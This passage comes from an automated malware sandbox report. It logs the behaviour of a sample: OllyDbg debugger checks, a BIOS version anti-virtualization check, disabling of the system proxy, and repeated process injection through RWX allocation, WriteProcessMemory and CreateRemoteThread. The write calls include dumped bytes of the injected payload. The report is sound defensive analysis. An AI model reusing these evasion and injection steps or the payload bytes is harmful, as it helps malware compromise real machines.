1619691124.130625 FindWindowA	class_name: OLLYDBG window_name:	failed
1619691124.145625 FindWindowA	class_name: OLLYDBG window_name:	failed
1619691125.067625 FindWindowA	class_name: OLLYDBG window_name:	failed

Checks the version of Bios, possibly for anti-virtualization (1 个事件)

registry

HKEY_LOCAL_MACHINE\SystemBiosVersion

Disables proxy possibly for traffic interception (1 个事件)

Time & API	Arguments	Status	Return	Repeated
1619691122.989625 RegSetValueExA	key_handle: 0x000002ac value: 0 regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	success	0	0

Creates a thread using CreateRemoteThread in a non-child process indicative of process injection (13 个事件)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2368 created a remote thread in non-child process 2616
Process injection	Process 2368 created a remote thread in non-child process 2288
1619691122.380625 CreateRemoteThread	thread_identifier: 0 process_identifier: 2616 function_address: 0x00321360 flags: 0 process_handle: 0x0000017c parameter: 0x00000000 stack_size: 0	success	476	0
1619691122.395625 CreateRemoteThread	thread_identifier: 0 process_identifier: 2288 function_address: 0x004a1360 flags: 0 process_handle: 0x0000017c parameter: 0x00000000 stack_size: 0	failed	0	0
1619691122.426625 CreateRemoteThread	thread_identifier: 0 process_identifier: 2288 function_address: 0x00501360 flags: 0 process_handle: 0x0000017c parameter: 0x00000000 stack_size: 0	failed	0	0
1619691122.458625 CreateRemoteThread	thread_identifier: 0 process_identifier: 2288 function_address: 0x02541360 flags: 0 process_handle: 0x0000017c parameter: 0x00000000 stack_size: 0	failed	0	0
1619691122.489625 CreateRemoteThread	thread_identifier: 0 process_identifier: 2288 function_address: 0x025a1360 flags: 0 process_handle: 0x0000017c parameter: 0x00000000 stack_size: 0	failed	0	0
1619691122.536625 CreateRemoteThread	thread_identifier: 0 process_identifier: 2288 function_address: 0x02601360 flags: 0 process_handle: 0x000001f0 parameter: 0x00000000 stack_size: 0	failed	0	0
1619691122.598625 CreateRemoteThread	thread_identifier: 0 process_identifier: 2288 function_address: 0x02661360 flags: 0 process_handle: 0x000001f4 parameter: 0x00000000 stack_size: 0	failed	0	0
1619691122.630625 CreateRemoteThread	thread_identifier: 0 process_identifier: 2288 function_address: 0x026c1360 flags: 0 process_handle: 0x000001f4 parameter: 0x00000000 stack_size: 0	failed	0	0
1619691122.676625 CreateRemoteThread	thread_identifier: 0 process_identifier: 2288 function_address: 0x02721360 flags: 0 process_handle: 0x000001f4 parameter: 0x00000000 stack_size: 0	failed	0	0
1619691122.723625 CreateRemoteThread	thread_identifier: 0 process_identifier: 2288 function_address: 0x02781360 flags: 0 process_handle: 0x000001f4 parameter: 0x00000000 stack_size: 0	failed	0	0
1619691122.739625 CreateRemoteThread	thread_identifier: 0 process_identifier: 2288 function_address: 0x027e1360 flags: 0 process_handle: 0x000001f4 parameter: 0x00000000 stack_size: 0	failed	0	0

Manipulates memory of a non-child process indicative of process injection (15 个事件)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2368 manipulating memory of non-child process 2368
Process injection	Process 2368 manipulating memory of non-child process 2616
Process injection	Process 2368 manipulating memory of non-child process 2288
1619691121.817625 NtAllocateVirtualMemory	process_identifier: 2368 region_size: 688128 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0x000000e8 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x02290000	success	0	0
1619691122.114625 NtAllocateVirtualMemory	process_identifier: 2616 region_size: 348160 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0x0000017c allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x00320000	success	0	0
1619691122.380625 NtAllocateVirtualMemory	process_identifier: 2288 region_size: 348160 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0x0000017c allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x004a0000	success	0	0
1619691122.411625 NtAllocateVirtualMemory	process_identifier: 2288 region_size: 348160 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0x0000017c allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x00500000	success	0	0
1619691122.426625 NtAllocateVirtualMemory	process_identifier: 2288 region_size: 348160 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0x0000017c allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x02540000	success	0	0
1619691122.473625 NtAllocateVirtualMemory	process_identifier: 2288 region_size: 348160 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0x0000017c allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x025a0000	success	0	0
1619691122.505625 NtAllocateVirtualMemory	process_identifier: 2288 region_size: 348160 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0x000001f0 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x02600000	success	0	0
1619691122.567625 NtAllocateVirtualMemory	process_identifier: 2288 region_size: 348160 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0x000001f4 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x02660000	success	0	0
1619691122.614625 NtAllocateVirtualMemory	process_identifier: 2288 region_size: 348160 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0x000001f4 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x026c0000	success	0	0
1619691122.645625 NtAllocateVirtualMemory	process_identifier: 2288 region_size: 348160 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0x000001f4 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x02720000	success	0	0
1619691122.676625 NtAllocateVirtualMemory	process_identifier: 2288 region_size: 348160 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0x000001f4 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x02780000	success	0	0
1619691122.723625 NtAllocateVirtualMemory	process_identifier: 2288 region_size: 348160 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) process_handle: 0x000001f4 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) base_address: 0x027e0000	success	0	0

Potential code injection by writing to the memory of another process (39 个事件)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2368 injected into non-child 2368
Process injection	Process 2368 injected into non-child 2616
Process injection	Process 2368 injected into non-child 2288
1619691121.817625 WriteProcessMemory	process_identifier: 2368 buffer: ÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $lÙÝ éÝ éÝ é²{FÜ é²{tÜ éRichÝ éL£Â7Nà! ` P*@@.text `.data @À.reloc`@(@B process_handle: 0x000000e8 base_address: 0x02290000	success	1	0
1619691121.817625 WriteProcessMemory	process_identifier: 2368 buffer: d¡0Vü@p@^ÃÌÌÌÌÌÌÌÌÌÌÌÌUììUWÇEü3ÉÁ}®tAëúMø:EøEEüt· iÀ?BÁ:uïEüÀyPREüUfòÀZf3Â%ÿÿÿEüZXEü_å]ÂÌÌÌÌUììVuF<W\|0xÿu _3À^å]ÂD0\|L7$UþS_ EüGÆÎÞEøMôÒyâÿÿÿ+W;W±ëC3ÒU;Ws0ëIUÆPèÿÿÿ9EtE@E;GráUMôEø;Wtp·QUüÞ×];Úsz;ßrv3À;.Et @<.uùEðþÿÿMü}üuMó¤Æðþÿÿ@hwFû Eè\|þÿÿPèÿÿÿjjðþÿÿRÿÐðöu[_3À^å]ÂEÃPèmþÿÿPVèÖþÿÿØÃ[_^å]ÂÌÌÌÌÌÌÌÌÌèX-ÕÃÌÌÌÌUìQ Ï¤thÀtdÁEü;Ès[SVQê3ö÷Âþÿÿÿv@·TqÂ%ÿÇ;Çr]ß;Ãsâðú0uUAèFÑè;ðrÃEüI;Èr©^[å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì3ÀVEäEèEìEðEôEøEüè=ÿÿÿðh]ý5Æpè[ýÿÿPèåýÿÿjMäQVÿÐEè^å]ÃÌÌÌÌUìì83ÀVWÇEäEèEìEðEôEøEüèèþÿÿðh]ý5ÆpèýÿÿPèýÿÿjMäQVÿÐ}è3ÀÇEÈEÌEÐEÔEØEÜEàè¤þÿÿðh]ý5ÆpèÂüÿÿPèLýÿÿjUÈRVÿÐEÌH<DPÇ_^å]ÃÌUììPVèaþÿÿðÆ hÌÂuøè\|üÿÿPèýÿÿ°þÿÿQhÿÐÀ[d0BHAWhÈ7 PèÔüÿÿVÿÐø}ìÿ.3ÀSÇE´E¸E¼EÀEÄEÈEÌèãýÿÿðh]ý5ÆpèüÿÿPèüÿÿjU´RVÿÐE¸H<tXwPhJÿaèÛûÿÿPèeüÿÿj@h0VjÿÐØ]ôÛµWTUð}ôuøMðó¤uì·V·FD0,Ò~*HüMôMøMðHøËMü}üuðMôó¤À(JuÙuìFPÓ+V4ûRPÆè;ýÿÿ¾Dû}øÀ³d$4hç[ãAuüè0ûÿÿPèºûÿÿVÿÐðöuhwFû èûÿÿPè¡ûÿÿMüVVQÿÐðöt^t?ëû?tGhÀy%ÿÿEüè×úÿÿPèaûÿÿUüRëDEüè¿úÿÿPèIûÿÿMüQVÿÐÇ?u¹}øG Ç}øÀTÿÿÿuì3ÀEÐEÔEØEÜEàEäEèèEüÿÿøh]ý5ÇpècúÿÿPèíúÿÿjUÐRWÿÐEÔH<TXUüèýÿÿEôFPÃEð}ðuôMüó¤Mìq(óthÅÖ\èúÿÿPè¢úÿÿ°þÿÿRÿÐÿÖ[_hÄÒmèûùÿÿPèúÿÿjÿÐ^å]Ã process_handle: 0x000000e8 base_address: 0x02291000	success	1	0
1619691121.833625 WriteProcessMemory	process_identifier: 2368 buffer: ×12ñ253s3ö35 process_handle: 0x000000e8 base_address: 0x022e4000	success	1	0
1619691122.114625 WriteProcessMemory	process_identifier: 2616 buffer: ÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $lÙÝ éÝ éÝ é²{FÜ é²{tÜ éRichÝ éL£Â7Nà! ` P@@.text `.data @À.reloc`@(@B process_handle: 0x0000017c base_address: 0x00320000	success	1	0
1619691122.114625 WriteProcessMemory	process_identifier: 2616 buffer: d¡0Vü@p@^ÃÌÌÌÌÌÌÌÌÌÌÌÌUììUWÇEü3ÉÁ}®tAëúMø:EøEEüt· iÀ?BÁ:uïEüÀyPREüUfòÀZf3Â%ÿÿÿEüZXEü_å]ÂÌÌÌÌUììVuF<W\|0xÿu _3À^å]ÂD0\|L7$UþS_ EüGÆÎÞEøMôÒyâÿÿÿ+W;W±ëC3ÒU;Ws0ëIUÆPèÿÿÿ9EtE@E;GráUMôEø;Wtp·QUüÞ×];Úsz;ßrv3À;.Et @<.uùEðþÿÿMü}üuMó¤Æðþÿÿ@hwFû Eè\|þÿÿPèÿÿÿjjðþÿÿRÿÐðöu[_3À^å]ÂEÃPèmþÿÿPVèÖþÿÿØÃ[_^å]ÂÌÌÌÌÌÌÌÌÌèX-ÕÃÌÌÌÌUìQ Ï¤thÀtdÁEü;Ès[SVQê3ö÷Âþÿÿÿv@·TqÂ%ÿÇ;Çr]ß;Ãsâðú0uUAèFÑè;ðrÃEüI;Èr©^[å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì3ÀVEäEèEìEðEôEøEüè=ÿÿÿðh]ý5Æpè[ýÿÿPèåýÿÿjMäQVÿÐEè^å]ÃÌÌÌÌUìì83ÀVWÇEäEèEìEðEôEøEüèèþÿÿðh]ý5ÆpèýÿÿPèýÿÿjMäQVÿÐ}è3ÀÇEÈEÌEÐEÔEØEÜEàè¤þÿÿðh]ý5ÆpèÂüÿÿPèLýÿÿjUÈRVÿÐEÌH<DPÇ_^å]ÃÌUììPVèaþÿÿðÆ hÌÂuøè\|üÿÿPèýÿÿ°þÿÿQhÿÐÀ[d0BHAWhÈ7 PèÔüÿÿVÿÐø}ìÿ.3ÀSÇE´E¸E¼EÀEÄEÈEÌèãýÿÿðh]ý5ÆpèüÿÿPèüÿÿjU´RVÿÐE¸H<tXwPhJÿaèÛûÿÿPèeüÿÿj@h0VjÿÐØ]ôÛµWTUð}ôuøMðó¤uì·V·FD0,Ò~*HüMôMøMðHøËMü}üuðMôó¤À(JuÙuìFPÓ+V4ûRPÆè;ýÿÿ¾Dû}øÀ³d$4hç[ãAuüè0ûÿÿPèºûÿÿVÿÐðöuhwFû èûÿÿPè¡ûÿÿMüVVQÿÐðöt^t?ëû?tGhÀy%ÿÿEüè×úÿÿPèaûÿÿUüRëDEüè¿úÿÿPèIûÿÿMüQVÿÐÇ?u¹}øG Ç}øÀTÿÿÿuì3ÀEÐEÔEØEÜEàEäEèèEüÿÿøh]ý5ÇpècúÿÿPèíúÿÿjUÐRWÿÐEÔH<TXUüèýÿÿEôFPÃEð}ðuôMüó¤Mìq(óthÅÖ\èúÿÿPè¢úÿÿ°þÿÿRÿÐÿÖ[_hÄÒmèûùÿÿPèúÿÿjÿÐ^å]Ã process_handle: 0x0000017c base_address: 0x00321000	success	1	0
1619691122.130625 WriteProcessMemory	process_identifier: 2616 buffer: ×12ñ253s3ö35 process_handle: 0x0000017c base_address: 0x00374000	success	1	0
1619691122.380625 WriteProcessMemory	process_identifier: 2288 buffer: ÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $lÙÝ éÝ éÝ é²{FÜ é²{tÜ éRichÝ éL£Â7Nà! ` P@@.text `.data @À.reloc`@(@B process_handle: 0x0000017c base_address: 0x004a0000	success	1	0
1619691122.380625 WriteProcessMemory	process_identifier: 2288 buffer: d¡0Vü@p@^ÃÌÌÌÌÌÌÌÌÌÌÌÌUììUWÇEü3ÉÁ}®tAëúMø:EøEEüt· iÀ?BÁ:uïEüÀyPREüUfòÀZf3Â%ÿÿÿEüZXEü_å]ÂÌÌÌÌUììVuF<W\|0xÿu _3À^å]ÂD0\|L7$UþS_ EüGÆÎÞEøMôÒyâÿÿÿ+W;W±ëC3ÒU;Ws0ëIUÆPèÿÿÿ9EtE@E;GráUMôEø;Wtp·QUüÞ×];Úsz;ßrv3À;.Et @<.uùEðþÿÿMü}üuMó¤Æðþÿÿ@hwFû Eè\|þÿÿPèÿÿÿjjðþÿÿRÿÐðöu[_3À^å]ÂEÃPèmþÿÿPVèÖþÿÿØÃ[_^å]ÂÌÌÌÌÌÌÌÌÌèX-ÕÃÌÌÌÌUìQ Ï¤thÀtdÁEü;Ès[SVQê3ö÷Âþÿÿÿv@·TqÂ%ÿÇ;Çr]ß;Ãsâðú0uUAèFÑè;ðrÃEüI;Èr©^[å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì3ÀVEäEèEìEðEôEøEüè=ÿÿÿðh]ý5Æpè[ýÿÿPèåýÿÿjMäQVÿÐEè^å]ÃÌÌÌÌUìì83ÀVWÇEäEèEìEðEôEøEüèèþÿÿðh]ý5ÆpèýÿÿPèýÿÿjMäQVÿÐ}è3ÀÇEÈEÌEÐEÔEØEÜEàè¤þÿÿðh]ý5ÆpèÂüÿÿPèLýÿÿjUÈRVÿÐEÌH<DPÇ_^å]ÃÌUììPVèaþÿÿðÆ hÌÂuøè\|üÿÿPèýÿÿ°þÿÿQhÿÐÀ[d0BHAWhÈ7 PèÔüÿÿVÿÐø}ìÿ.3ÀSÇE´E¸E¼EÀEÄEÈEÌèãýÿÿðh]ý5ÆpèüÿÿPèüÿÿjU´RVÿÐE¸H<tXwPhJÿaèÛûÿÿPèeüÿÿj@h0VjÿÐØ]ôÛµWTUð}ôuøMðó¤uì·V·FD0,Ò~*HüMôMøMðHøËMü}üuðMôó¤À(JuÙuìFPÓ+V4ûRPÆè;ýÿÿ¾Dû}øÀ³d$4hç[ãAuüè0ûÿÿPèºûÿÿVÿÐðöuhwFû èûÿÿPè¡ûÿÿMüVVQÿÐðöt^t?ëû?tGhÀy%ÿÿEüè×úÿÿPèaûÿÿUüRëDEüè¿úÿÿPèIûÿÿMüQVÿÐÇ?u¹}øG Ç}øÀTÿÿÿuì3ÀEÐEÔEØEÜEàEäEèèEüÿÿøh]ý5ÇpècúÿÿPèíúÿÿjUÐRWÿÐEÔH<TXUüèýÿÿEôFPÃEð}ðuôMüó¤Mìq(óthÅÖ\èúÿÿPè¢úÿÿ°þÿÿRÿÐÿÖ[_hÄÒmèûùÿÿPèúÿÿjÿÐ^å]Ã process_handle: 0x0000017c base_address: 0x004a1000	success	1	0
1619691122.395625 WriteProcessMemory	process_identifier: 2288 buffer: ×12ñ253s3ö35 process_handle: 0x0000017c base_address: 0x004f4000	success	1	0
1619691122.411625 WriteProcessMemory	process_identifier: 2288 buffer: ÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $lÙÝ éÝ éÝ é²{FÜ é²{tÜ éRichÝ éL£Â7Nà! ` P@@.text `.data @À.reloc`@(@B process_handle: 0x0000017c base_address: 0x00500000	success	1	0
1619691122.411625 WriteProcessMemory	process_identifier: 2288 buffer: d¡0Vü@p@^ÃÌÌÌÌÌÌÌÌÌÌÌÌUììUWÇEü3ÉÁ}®tAëúMø:EøEEüt· iÀ?BÁ:uïEüÀyPREüUfòÀZf3Â%ÿÿÿEüZXEü_å]ÂÌÌÌÌUììVuF<W\|0xÿu _3À^å]ÂD0\|L7$UþS_ EüGÆÎÞEøMôÒyâÿÿÿ+W;W±ëC3ÒU;Ws0ëIUÆPèÿÿÿ9EtE@E;GráUMôEø;Wtp·QUüÞ×];Úsz;ßrv3À;.Et @<.uùEðþÿÿMü}üuMó¤Æðþÿÿ@hwFû Eè\|þÿÿPèÿÿÿjjðþÿÿRÿÐðöu[_3À^å]ÂEÃPèmþÿÿPVèÖþÿÿØÃ[_^å]ÂÌÌÌÌÌÌÌÌÌèX-ÕÃÌÌÌÌUìQ Ï¤thÀtdÁEü;Ès[SVQê3ö÷Âþÿÿÿv@·TqÂ%ÿÇ;Çr]ß;Ãsâðú0uUAèFÑè;ðrÃEüI;Èr©^[å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì3ÀVEäEèEìEðEôEøEüè=ÿÿÿðh]ý5Æpè[ýÿÿPèåýÿÿjMäQVÿÐEè^å]ÃÌÌÌÌUìì83ÀVWÇEäEèEìEðEôEøEüèèþÿÿðh]ý5ÆpèýÿÿPèýÿÿjMäQVÿÐ}è3ÀÇEÈEÌEÐEÔEØEÜEàè¤þÿÿðh]ý5ÆpèÂüÿÿPèLýÿÿjUÈRVÿÐEÌH<DPÇ_^å]ÃÌUììPVèaþÿÿðÆ hÌÂuøè\|üÿÿPèýÿÿ°þÿÿQhÿÐÀ[d0BHAWhÈ7 PèÔüÿÿVÿÐø}ìÿ.3ÀSÇE´E¸E¼EÀEÄEÈEÌèãýÿÿðh]ý5ÆpèüÿÿPèüÿÿjU´RVÿÐE¸H<tXwPhJÿaèÛûÿÿPèeüÿÿj@h0VjÿÐØ]ôÛµWTUð}ôuøMðó¤uì·V·FD0,Ò~*HüMôMøMðHøËMü}üuðMôó¤À(JuÙuìFPÓ+V4ûRPÆè;ýÿÿ¾Dû}øÀ³d$4hç[ãAuüè0ûÿÿPèºûÿÿVÿÐðöuhwFû èûÿÿPè¡ûÿÿMüVVQÿÐðöt^t?ëû?tGhÀy%ÿÿEüè×úÿÿPèaûÿÿUüRëDEüè¿úÿÿPèIûÿÿMüQVÿÐÇ?u¹}øG Ç}øÀTÿÿÿuì3ÀEÐEÔEØEÜEàEäEèèEüÿÿøh]ý5ÇpècúÿÿPèíúÿÿjUÐRWÿÐEÔH<TXUüèýÿÿEôFPÃEð}ðuôMüó¤Mìq(óthÅÖ\èúÿÿPè¢úÿÿ°þÿÿRÿÐÿÖ[_hÄÒmèûùÿÿPèúÿÿjÿÐ^å]Ã process_handle: 0x0000017c base_address: 0x00501000	success	1	0
1619691122.426625 WriteProcessMemory	process_identifier: 2288 buffer: ×12ñ253s3ö35 process_handle: 0x0000017c base_address: 0x00554000	success	1	0
1619691122.426625 WriteProcessMemory	process_identifier: 2288 buffer: ÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $lÙÝ éÝ éÝ é²{FÜ é²{tÜ éRichÝ éL£Â7Nà! ` P@@.text `.data @À.reloc`@(@B process_handle: 0x0000017c base_address: 0x02540000	success	1	0
1619691122.426625 WriteProcessMemory	process_identifier: 2288 buffer: d¡0Vü@p@^ÃÌÌÌÌÌÌÌÌÌÌÌÌUììUWÇEü3ÉÁ}®tAëúMø:EøEEüt· iÀ?BÁ:uïEüÀyPREüUfòÀZf3Â%ÿÿÿEüZXEü_å]ÂÌÌÌÌUììVuF<W\|0xÿu _3À^å]ÂD0\|L7$UþS_ EüGÆÎÞEøMôÒyâÿÿÿ+W;W±ëC3ÒU;Ws0ëIUÆPèÿÿÿ9EtE@E;GráUMôEø;Wtp·QUüÞ×];Úsz;ßrv3À;.Et @<.uùEðþÿÿMü}üuMó¤Æðþÿÿ@hwFû Eè\|þÿÿPèÿÿÿjjðþÿÿRÿÐðöu[_3À^å]ÂEÃPèmþÿÿPVèÖþÿÿØÃ[_^å]ÂÌÌÌÌÌÌÌÌÌèX-ÕÃÌÌÌÌUìQ Ï¤thÀtdÁEü;Ès[SVQê3ö÷Âþÿÿÿv@·TqÂ%ÿÇ;Çr]ß;Ãsâðú0uUAèFÑè;ðrÃEüI;Èr©^[å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì3ÀVEäEèEìEðEôEøEüè=ÿÿÿðh]ý5Æpè[ýÿÿPèåýÿÿjMäQVÿÐEè^å]ÃÌÌÌÌUìì83ÀVWÇEäEèEìEðEôEøEüèèþÿÿðh]ý5ÆpèýÿÿPèýÿÿjMäQVÿÐ}è3ÀÇEÈEÌEÐEÔEØEÜEàè¤þÿÿðh]ý5ÆpèÂüÿÿPèLýÿÿjUÈRVÿÐEÌH<DPÇ_^å]ÃÌUììPVèaþÿÿðÆ hÌÂuøè\|üÿÿPèýÿÿ°þÿÿQhÿÐÀ[d0BHAWhÈ7 PèÔüÿÿVÿÐø}ìÿ.3ÀSÇE´E¸E¼EÀEÄEÈEÌèãýÿÿðh]ý5ÆpèüÿÿPèüÿÿjU´RVÿÐE¸H<tXwPhJÿaèÛûÿÿPèeüÿÿj@h0VjÿÐØ]ôÛµWTUð}ôuøMðó¤uì·V·FD0,Ò~*HüMôMøMðHøËMü}üuðMôó¤À(JuÙuìFPÓ+V4ûRPÆè;ýÿÿ¾Dû}øÀ³d$4hç[ãAuüè0ûÿÿPèºûÿÿVÿÐðöuhwFû èûÿÿPè¡ûÿÿMüVVQÿÐðöt^t?ëû?tGhÀy%ÿÿEüè×úÿÿPèaûÿÿUüRëDEüè¿úÿÿPèIûÿÿMüQVÿÐÇ?u¹}øG Ç}øÀTÿÿÿuì3ÀEÐEÔEØEÜEàEäEèèEüÿÿøh]ý5ÇpècúÿÿPèíúÿÿjUÐRWÿÐEÔH<TXUüèýÿÿEôFPÃEð}ðuôMüó¤Mìq(óthÅÖ\èúÿÿPè¢úÿÿ°þÿÿRÿÐÿÖ[_hÄÒmèûùÿÿPèúÿÿjÿÐ^å]Ã process_handle: 0x0000017c base_address: 0x02541000	success	1	0
1619691122.458625 WriteProcessMemory	process_identifier: 2288 buffer: ×12ñ253s3ö35 process_handle: 0x0000017c base_address: 0x02594000	success	1	0
1619691122.473625 WriteProcessMemory	process_identifier: 2288 buffer: ÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $lÙÝ éÝ éÝ é²{FÜ é²{tÜ éRichÝ éL£Â7Nà! ` P@@.text `.data @À.reloc`@(@B process_handle: 0x0000017c base_address: 0x025a0000	success	1	0
1619691122.473625 WriteProcessMemory	process_identifier: 2288 buffer: d¡0Vü@p@^ÃÌÌÌÌÌÌÌÌÌÌÌÌUììUWÇEü3ÉÁ}®tAëúMø:EøEEüt· iÀ?BÁ:uïEüÀyPREüUfòÀZf3Â%ÿÿÿEüZXEü_å]ÂÌÌÌÌUììVuF<W\|0xÿu _3À^å]ÂD0\|L7$UþS_ EüGÆÎÞEøMôÒyâÿÿÿ+W;W±ëC3ÒU;Ws0ëIUÆPèÿÿÿ9EtE@E;GráUMôEø;Wtp·QUüÞ×];Úsz;ßrv3À;.Et @<.uùEðþÿÿMü}üuMó¤Æðþÿÿ@hwFû Eè\|þÿÿPèÿÿÿjjðþÿÿRÿÐðöu[_3À^å]ÂEÃPèmþÿÿPVèÖþÿÿØÃ[_^å]ÂÌÌÌÌÌÌÌÌÌèX-ÕÃÌÌÌÌUìQ Ï¤thÀtdÁEü;Ès[SVQê3ö÷Âþÿÿÿv@·TqÂ%ÿÇ;Çr]ß;Ãsâðú0uUAèFÑè;ðrÃEüI;Èr©^[å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì3ÀVEäEèEìEðEôEøEüè=ÿÿÿðh]ý5Æpè[ýÿÿPèåýÿÿjMäQVÿÐEè^å]ÃÌÌÌÌUìì83ÀVWÇEäEèEìEðEôEøEüèèþÿÿðh]ý5ÆpèýÿÿPèýÿÿjMäQVÿÐ}è3ÀÇEÈEÌEÐEÔEØEÜEàè¤þÿÿðh]ý5ÆpèÂüÿÿPèLýÿÿjUÈRVÿÐEÌH<DPÇ_^å]ÃÌUììPVèaþÿÿðÆ hÌÂuøè\|üÿÿPèýÿÿ°þÿÿQhÿÐÀ[d0BHAWhÈ7 PèÔüÿÿVÿÐø}ìÿ.3ÀSÇE´E¸E¼EÀEÄEÈEÌèãýÿÿðh]ý5ÆpèüÿÿPèüÿÿjU´RVÿÐE¸H<tXwPhJÿaèÛûÿÿPèeüÿÿj@h0VjÿÐØ]ôÛµWTUð}ôuøMðó¤uì·V·FD0,Ò~*HüMôMøMðHøËMü}üuðMôó¤À(JuÙuìFPÓ+V4ûRPÆè;ýÿÿ¾Dû}øÀ³d$4hç[ãAuüè0ûÿÿPèºûÿÿVÿÐðöuhwFû èûÿÿPè¡ûÿÿMüVVQÿÐðöt^t?ëû?tGhÀy%ÿÿEüè×úÿÿPèaûÿÿUüRëDEüè¿úÿÿPèIûÿÿMüQVÿÐÇ?u¹}øG Ç}øÀTÿÿÿuì3ÀEÐEÔEØEÜEàEäEèèEüÿÿøh]ý5ÇpècúÿÿPèíúÿÿjUÐRWÿÐEÔH<TXUüèýÿÿEôFPÃEð}ðuôMüó¤Mìq(óthÅÖ\èúÿÿPè¢úÿÿ°þÿÿRÿÐÿÖ[_hÄÒmèûùÿÿPèúÿÿjÿÐ^å]Ã process_handle: 0x0000017c base_address: 0x025a1000	success	1	0
1619691122.473625 WriteProcessMemory	process_identifier: 2288 buffer: ×12ñ253s3ö35 process_handle: 0x0000017c base_address: 0x025f4000	success	1	0
1619691122.505625 WriteProcessMemory	process_identifier: 2288 buffer: ÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $lÙÝ éÝ éÝ é²{FÜ é²{tÜ éRichÝ éL£Â7Nà! ` P@@.text `.data @À.reloc`@(@B process_handle: 0x000001f0 base_address: 0x02600000	success	1	0
1619691122.505625 WriteProcessMemory	process_identifier: 2288 buffer: d¡0Vü@p@^ÃÌÌÌÌÌÌÌÌÌÌÌÌUììUWÇEü3ÉÁ}®tAëúMø:EøEEüt· iÀ?BÁ:uïEüÀyPREüUfòÀZf3Â%ÿÿÿEüZXEü_å]ÂÌÌÌÌUììVuF<W\|0xÿu _3À^å]ÂD0\|L7$UþS_ EüGÆÎÞEøMôÒyâÿÿÿ+W;W±ëC3ÒU;Ws0ëIUÆPèÿÿÿ9EtE@E;GráUMôEø;Wtp·QUüÞ×];Úsz;ßrv3À;.Et @<.uùEðþÿÿMü}üuMó¤Æðþÿÿ@hwFû Eè\|þÿÿPèÿÿÿjjðþÿÿRÿÐðöu[_3À^å]ÂEÃPèmþÿÿPVèÖþÿÿØÃ[_^å]ÂÌÌÌÌÌÌÌÌÌèX-ÕÃÌÌÌÌUìQ Ï¤thÀtdÁEü;Ès[SVQê3ö÷Âþÿÿÿv@·TqÂ%ÿÇ;Çr]ß;Ãsâðú0uUAèFÑè;ðrÃEüI;Èr©^[å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì3ÀVEäEèEìEðEôEøEüè=ÿÿÿðh]ý5Æpè[ýÿÿPèåýÿÿjMäQVÿÐEè^å]ÃÌÌÌÌUìì83ÀVWÇEäEèEìEðEôEøEüèèþÿÿðh]ý5ÆpèýÿÿPèýÿÿjMäQVÿÐ}è3ÀÇEÈEÌEÐEÔEØEÜEàè¤þÿÿðh]ý5ÆpèÂüÿÿPèLýÿÿjUÈRVÿÐEÌH<DPÇ_^å]ÃÌUììPVèaþÿÿðÆ hÌÂuøè\|üÿÿPèýÿÿ°þÿÿQhÿÐÀ[d0BHAWhÈ7 